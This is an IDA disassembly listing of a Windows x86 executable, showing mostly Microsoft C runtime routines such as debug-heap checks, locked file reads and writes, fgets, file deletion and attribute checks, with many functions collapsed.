push 0
mov edx, dword_4F3BE8
push edx
call ds:dword_4F5474 ; HeapValidate
jmp short loc_41DA30
; ---------------------------------------------------------------------------
loc_41DA1A: ; CODE XREF: sub_41D910+A5�j
mov eax, [ebp+arg_0]
sub eax, 20h
push eax
push 0
mov ecx, dword_4F3BE8
push ecx
call ds:dword_4F5474 ; HeapValidate
loc_41DA30: ; CODE XREF: sub_41D910+E�j
; sub_41D910+2C�j ...
mov esp, ebp
pop ebp
retn
sub_41D910 endp
; ---------------------------------------------------------------------------
align 10h
; [00000106 BYTES: COLLAPSED FUNCTION __CrtIsMemoryBlock. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41DB46. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000014 BYTES: COLLAPSED CHUNK OF FUNCTION __CrtIsMemoryBlock. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, dword_4F4C38
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_4F4C38, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DB90 proc near ; CODE XREF: __CrtDumpMemoryLeaks+D�p
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041DD23 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43CB38
push offset unknown_libname_3 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_41DBE4
loc_41DBB9: ; CODE XREF: sub_41DB90+4D�j
push offset a_crtmemcheckpo ; "_CrtMemCheckPoint: NULL state pointer.\n"...
push offset aS_32 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41DBD9
int 3 ; Trap to Debugger
loc_41DBD9: ; CODE XREF: sub_41DB90+46�j
xor eax, eax
test eax, eax
jnz short loc_41DBB9
jmp loc_41DD23
; ---------------------------------------------------------------------------
loc_41DBE4: ; CODE XREF: sub_41DB90+27�j
push 9
call __lock
add esp, 4
mov [ebp+var_4], 0
mov ecx, [ebp+arg_0]
mov edx, dword_4F34FC
mov [ecx], edx
mov [ebp+var_1C], 0
jmp short loc_41DC12
; ---------------------------------------------------------------------------
loc_41DC09: ; CODE XREF: sub_41DB90+A4�j
mov eax, [ebp+var_1C]
add eax, 1
mov [ebp+var_1C], eax
loc_41DC12: ; CODE XREF: sub_41DB90+77�j
cmp [ebp+var_1C], 5
jge short loc_41DC36
mov ecx, [ebp+var_1C]
mov edx, [ebp+arg_0]
mov dword ptr [edx+ecx*4+18h], 0
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+eax*4+4], 0
jmp short loc_41DC09
; ---------------------------------------------------------------------------
loc_41DC36: ; CODE XREF: sub_41DB90+86�j
mov edx, dword_4F34FC
mov dword ptr [ebp+var_20], edx
jmp short loc_41DC49
; ---------------------------------------------------------------------------
loc_41DC41: ; CODE XREF: sub_41DB90:loc_41DCED�j
mov eax, dword ptr [ebp+var_20]
mov ecx, [eax]
mov dword ptr [ebp+var_20], ecx
loc_41DC49: ; CODE XREF: sub_41DB90+AF�j
cmp dword ptr [ebp+var_20], 0
jz loc_41DCF2
mov edx, dword ptr [ebp+var_20]
mov eax, [edx+14h]
and eax, 0FFFFh
test eax, eax
jl short loc_41DCC8
mov ecx, dword ptr [ebp+var_20]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 5
jge short loc_41DCC8
mov eax, dword ptr [ebp+var_20]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, [ebp+arg_0]
mov eax, [edx+ecx*4+4]
add eax, 1
mov ecx, dword ptr [ebp+var_20]
mov edx, [ecx+14h]
and edx, 0FFFFh
mov ecx, [ebp+arg_0]
mov [ecx+edx*4+4], eax
mov edx, dword ptr [ebp+var_20]
mov eax, [edx+14h]
and eax, 0FFFFh
mov ecx, [ebp+arg_0]
mov edx, [ecx+eax*4+18h]
mov eax, dword ptr [ebp+var_20]
add edx, [eax+10h]
mov ecx, dword ptr [ebp+var_20]
mov eax, [ecx+14h]
and eax, 0FFFFh
mov ecx, [ebp+arg_0]
mov [ecx+eax*4+18h], edx
jmp short loc_41DCED
; ---------------------------------------------------------------------------
loc_41DCC8: ; CODE XREF: sub_41DB90+D0�j
; sub_41DB90+E1�j ...
mov edx, dword ptr [ebp+var_20]
push edx ; char
push offset aBadMemoryBlock ; "Bad memory block found at 0x%08X.\n"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41DCE7
int 3 ; Trap to Debugger
loc_41DCE7: ; CODE XREF: sub_41DB90+154�j
xor eax, eax
test eax, eax
jnz short loc_41DCC8
loc_41DCED: ; CODE XREF: sub_41DB90+136�j
jmp loc_41DC41
; ---------------------------------------------------------------------------
loc_41DCF2: ; CODE XREF: sub_41DB90+BD�j
mov ecx, [ebp+arg_0]
mov edx, dword_4F3504
mov [ecx+2Ch], edx
mov eax, [ebp+arg_0]
mov ecx, dword_4F34F8
mov [eax+30h], ecx
mov [ebp+var_4], 0FFFFFFFFh
call sub_41DD18
jmp short loc_41DD23
sub_41DB90 endp
; =============== S U B R O U T I N E =======================================
sub_41DD18 proc near ; CODE XREF: sub_41DB90+181�p
; DATA XREF: .rdata:0043CB40�o
push 9
call __unlock
add esp, 4
retn
sub_41DD18 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41DB90
loc_41DD23: ; CODE XREF: sub_41DB90+4F�j
; sub_41DB90+186�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41DB90
; ---------------------------------------------------------------------------
align 10h
; [00000123 BYTES: COLLAPSED FUNCTION __CrtMemDifference. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000002B1 BYTES: COLLAPSED FUNCTION __CrtMemDumpAllObjectsSince. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41E121. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000037 BYTES: COLLAPSED CHUNK OF FUNCTION __CrtMemDumpAllObjectsSince. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000114 BYTES: COLLAPSED FUNCTION __printMemBlockData. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000074 BYTES: COLLAPSED FUNCTION __CrtDumpMemoryLeaks. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000C5 BYTES: COLLAPSED FUNCTION __CrtMemDumpStatistics. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41E3E0(void *DstBuf,size_t ElementSize,size_t Count,FILE *File)
sub_41E3E0 proc near ; CODE XREF: sub_4010AB+45�p
; sub_40FAB6+4E�p ...
var_4 = dword ptr -4
DstBuf = dword ptr 8
ElementSize = dword ptr 0Ch
Count = dword ptr 10h
File = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+File]
push eax
call __lock_file
add esp, 4
mov ecx, [ebp+File]
push ecx ; File
mov edx, [ebp+Count]
push edx ; Count
mov eax, [ebp+ElementSize]
push eax ; ElementSize
mov ecx, [ebp+DstBuf]
push ecx ; DstBuf
call _fread
add esp, 10h
mov [ebp+var_4], eax
mov edx, [ebp+File]
push edx
call __unlock_file
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_41E3E0 endp
; ---------------------------------------------------------------------------
align 10h
; [000001CF BYTES: COLLAPSED FUNCTION _fread. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FC BYTES: COLLAPSED FUNCTION __fsopen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000017 BYTES: COLLAPSED FUNCTION _fopen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000058 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FE BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FF BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000011 BYTES: COLLAPSED FUNCTION _atoi. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000129 BYTES: COLLAPSED FUNCTION __atoi64. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000038 BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000015 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000013 BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000013 BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E3 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000F BYTES: COLLAPSED FUNCTION __lockexit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000F BYTES: COLLAPSED FUNCTION __unlockexit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000025 BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FA BYTES: COLLAPSED FUNCTION _sprintf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000010 BYTES: COLLAPSED FUNCTION _srand. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION _rand. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000080 BYTES: COLLAPSED FUNCTION _strstr. PRESS KEYPAD "+" TO EXPAND]
; [000000F9 BYTES: COLLAPSED FUNCTION __snprintf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000242 BYTES: COLLAPSED FUNCTION __splitpath. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F210 proc near ; CODE XREF: sub_401CC7+7627�p
; sub_401CC7+7656�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
File = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_10], ecx
loc_41F225: ; CODE XREF: sub_41F210+3D�j
cmp [ebp+arg_0], 0
jnz short loc_41F249
push offset aStringNull ; "string != NULL"
push 0 ; int
push 3Bh ; Value
push offset aFgets_c ; "fgets.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41F249
int 3 ; Trap to Debugger
loc_41F249: ; CODE XREF: sub_41F210+19�j
; sub_41F210+36�j
xor edx, edx
test edx, edx
jnz short loc_41F225
loc_41F24F: ; CODE XREF: sub_41F210+67�j
cmp [ebp+arg_8], 0
jnz short loc_41F273
push offset aStrNull ; "str != NULL"
push 0 ; int
push 3Ch ; Value
push offset aFgets_c ; "fgets.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41F273
int 3 ; Trap to Debugger
loc_41F273: ; CODE XREF: sub_41F210+43�j
; sub_41F210+60�j
xor eax, eax
test eax, eax
jnz short loc_41F24F
cmp [ebp+arg_4], 0
jg short loc_41F286
xor eax, eax
jmp loc_41F347
; ---------------------------------------------------------------------------
loc_41F286: ; CODE XREF: sub_41F210+6D�j
mov ecx, [ebp+arg_8]
mov [ebp+File], ecx
mov edx, [ebp+File]
push edx
call __lock_file
add esp, 4
loc_41F298: ; CODE XREF: sub_41F210:loc_41F32D�j
mov eax, [ebp+arg_4]
sub eax, 1
mov [ebp+arg_4], eax
cmp [ebp+arg_4], 0
jz loc_41F332
mov ecx, [ebp+File]
mov edx, [ecx+4]
sub edx, 1
mov eax, [ebp+File]
mov [eax+4], edx
mov ecx, [ebp+File]
cmp dword ptr [ecx+4], 0
jl short loc_41F2E3
mov edx, [ebp+File]
mov eax, [edx]
movsx ecx, byte ptr [eax]
and ecx, 0FFh
mov [ebp+var_14], ecx
mov edx, [ebp+File]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+File]
mov [ecx], eax
jmp short loc_41F2F2
; ---------------------------------------------------------------------------
loc_41F2E3: ; CODE XREF: sub_41F210+B1�j
mov edx, [ebp+File]
push edx ; File
call __filbuf
add esp, 4
mov [ebp+var_14], eax
loc_41F2F2: ; CODE XREF: sub_41F210+D1�j
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_41F311
mov ecx, [ebp+var_8]
cmp ecx, [ebp+arg_0]
jnz short loc_41F30F
mov [ebp+var_10], 0
jmp short loc_41F338
; ---------------------------------------------------------------------------
loc_41F30F: ; CODE XREF: sub_41F210+F4�j
jmp short loc_41F332
; ---------------------------------------------------------------------------
loc_41F311: ; CODE XREF: sub_41F210+EC�j
mov edx, [ebp+var_8]
mov al, byte ptr [ebp+var_C]
mov [edx], al
movsx ecx, byte ptr [ebp+var_C]
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
cmp ecx, 0Ah
jnz short loc_41F32D
jmp short loc_41F332
; ---------------------------------------------------------------------------
loc_41F32D: ; CODE XREF: sub_41F210+119�j
jmp loc_41F298
; ---------------------------------------------------------------------------
loc_41F332: ; CODE XREF: sub_41F210+95�j
; sub_41F210:loc_41F30F�j ...
mov eax, [ebp+var_8]
mov byte ptr [eax], 0
loc_41F338: ; CODE XREF: sub_41F210+FD�j
mov ecx, [ebp+File]
push ecx
call __unlock_file
add esp, 4
mov eax, [ebp+var_10]
loc_41F347: ; CODE XREF: sub_41F210+71�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41F210 endp
; ---------------------------------------------------------------------------
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION _strtol. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000331 BYTES: COLLAPSED FUNCTION _strtoxl. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION _strtoul. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F6D0 proc near ; CODE XREF: sub_401CC7+5A01�p
; .text:0041F727�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F5354 ; DeleteFileA
test eax, eax
jnz short loc_41F6ED
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov [ebp+var_4], eax
jmp short loc_41F6F4
; ---------------------------------------------------------------------------
loc_41F6ED: ; CODE XREF: sub_41F6D0+10�j
mov [ebp+var_4], 0
loc_41F6F4: ; CODE XREF: sub_41F6D0+1B�j
cmp [ebp+var_4], 0
jz short loc_41F70B
mov ecx, [ebp+var_4]
push ecx
call __dosmaperr
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_41F70D
; ---------------------------------------------------------------------------
loc_41F70B: ; CODE XREF: sub_41F6D0+28�j
xor eax, eax
loc_41F70D: ; CODE XREF: sub_41F6D0+39�j
mov esp, ebp
pop ebp
retn
sub_41F6D0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, [ebp+8]
push eax
call sub_41F6D0
add esp, 4
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [000000C1 BYTES: COLLAPSED FUNCTION _fprintf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000027 BYTES: COLLAPSED FUNCTION _strrchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000038 BYTES: COLLAPSED FUNCTION _strncmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E0 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BC BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000084 BYTES: COLLAPSED FUNCTION _strcmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000145 BYTES: COLLAPSED FUNCTION _strtok. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000F3 BYTES: COLLAPSED FUNCTION __vsnprintf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000123 BYTES: COLLAPSED FUNCTION _strncat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B7 BYTES: COLLAPSED FUNCTION _sscanf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000135 BYTES: COLLAPSED FUNCTION _floor. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000021 BYTES: COLLAPSED FUNCTION __fpmath. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000005 BYTES: COLLAPSED FUNCTION __initp_misc_winxfltr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION __cfltcvt_init. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, dword_4F3550
mov [ebp-4], eax
mov ecx, [ebp+8]
mov dword_4F3550, ecx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; [00000027 BYTES: COLLAPSED FUNCTION __ftol. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000135 BYTES: COLLAPSED FUNCTION _ceil. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002D BYTES: COLLAPSED FUNCTION _JumpToContinuation(void *,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION sub_4205F0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION sub_420600. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION sub_420610. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000056 BYTES: COLLAPSED FUNCTION _UnwindNestedFrames(EHRegistrationNode *,EHExceptionRecord *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION ___CxxFrameHandler3. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000026 BYTES: COLLAPSED FUNCTION __CxxLongjmpUnwind(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION _CallCatchBlock2(EHRegistrationNode *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000039 BYTES: COLLAPSED FUNCTION CatchGuardHandler(EHExceptionRecord *,CatchGuardRN *,void *,void *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000CC BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000081 BYTES: COLLAPSED FUNCTION TranslatorGuardHandler(EHExceptionRecord *,TranslatorGuardRN *,void *,void *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000082 BYTES: COLLAPSED FUNCTION _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __NLG_Notify1. PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION __EH_prolog. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000A1 BYTES: COLLAPSED FUNCTION operator delete(void *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001C BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B3 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000018 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004D BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000181 BYTES: COLLAPSED FUNCTION _time. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000D0 BYTES: COLLAPSED FUNCTION __strcmpi. PRESS KEYPAD "+" TO EXPAND]
; [0000006A BYTES: COLLAPSED FUNCTION _fseek. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000127 BYTES: COLLAPSED FUNCTION __fseek_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_421420(void *Str,size_t Size,size_t Count,FILE *File)
sub_421420 proc near ; CODE XREF: sub_416D25+127�p
var_4 = dword ptr -4
Str = dword ptr 8
Size = dword ptr 0Ch
Count = dword ptr 10h
File = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+File]
push eax
call __lock_file
add esp, 4
mov ecx, [ebp+File]
push ecx ; File
mov edx, [ebp+Count]
push edx ; Count
mov eax, [ebp+Size]
push eax ; Size
mov ecx, [ebp+Str]
push ecx ; Str
call _fwrite
add esp, 10h
mov [ebp+var_4], eax
mov edx, [ebp+File]
push edx
call __unlock_file
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_421420 endp
; ---------------------------------------------------------------------------
align 10h
; [00000219 BYTES: COLLAPSED FUNCTION _fwrite. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421680 proc near ; CODE XREF: sub_417471+8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F536C ; GetFileAttributesA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_4216AB
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
call __dosmaperr
add esp, 4
or eax, 0FFFFFFFFh
jmp short loc_4216DC
; ---------------------------------------------------------------------------
loc_4216AB: ; CODE XREF: sub_421680+15�j
mov ecx, [ebp+var_4]
and ecx, 1
test ecx, ecx
jz short loc_4216DA
mov edx, [ebp+arg_4]
and edx, 2
test edx, edx
jz short loc_4216DA
call __errno
mov dword ptr [eax], 0Dh
call ___doserrno
mov dword ptr [eax], 5
or eax, 0FFFFFFFFh
jmp short loc_4216DC
; ---------------------------------------------------------------------------
loc_4216DA: ; CODE XREF: sub_421680+33�j
; sub_421680+3D�j
xor eax, eax
loc_4216DC: ; CODE XREF: sub_421680+29�j
; sub_421680+58�j
mov esp, ebp
pop ebp
retn
sub_421680 endp
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000075 BYTES: COLLAPSED FUNCTION __aullrem. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AA BYTES: COLLAPSED FUNCTION __alldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001BF BYTES: COLLAPSED FUNCTION __strupr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION _isalpha. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION _isupper. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION _islower. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION _isdigit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION _isxdigit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION _isspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION _ispunct. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION _isalnum. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION _isprint. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000041 BYTES: COLLAPSED FUNCTION _isgraph. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003C BYTES: COLLAPSED FUNCTION _iscntrl. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000010 BYTES: COLLAPSED FUNCTION ___isascii. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION ___toascii. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005F BYTES: COLLAPSED FUNCTION ___iscsymf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005F BYTES: COLLAPSED FUNCTION ___iscsym. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AC BYTES: COLLAPSED FUNCTION _memcmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000000B BYTES: COLLAPSED FUNCTION __tolower. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000093 BYTES: COLLAPSED FUNCTION _tolower. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000012B BYTES: COLLAPSED FUNCTION _tolower_0. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000030 BYTES: COLLAPSED FUNCTION _wcslen. PRESS KEYPAD "+" TO EXPAND]
; [0000007A BYTES: COLLAPSED FUNCTION _mbstowcs. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000001EB BYTES: COLLAPSED FUNCTION __mbstowcs_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000132 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_422492 proc near ; DATA XREF: .rdata:0043CDEC�o
mov ecx, [ebp-14h]
mov edx, [ecx]
mov eax, [edx]
mov [ebp-68h], eax
mov ecx, [ebp-14h]
push ecx
mov edx, [ebp-68h]
push edx
call __XcptFilter
add esp, 8
retn
sub_422492 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4224AD proc near ; DATA XREF: .rdata:0043CDF0�o
mov esp, [ebp-18h]
mov eax, [ebp-68h]
push eax ; Code
call __exit
sub_4224AD endp
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000028 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
add esp, 4
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [0000002A BYTES: COLLAPSED FUNCTION _fast_error_exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000012C BYTES: COLLAPSED FUNCTION ___initstdio. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001A BYTES: COLLAPSED FUNCTION ___endstdio. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __lock_file. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000029 BYTES: COLLAPSED FUNCTION __lock_file2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __unlock_file. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000029 BYTES: COLLAPSED FUNCTION __unlock_file2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
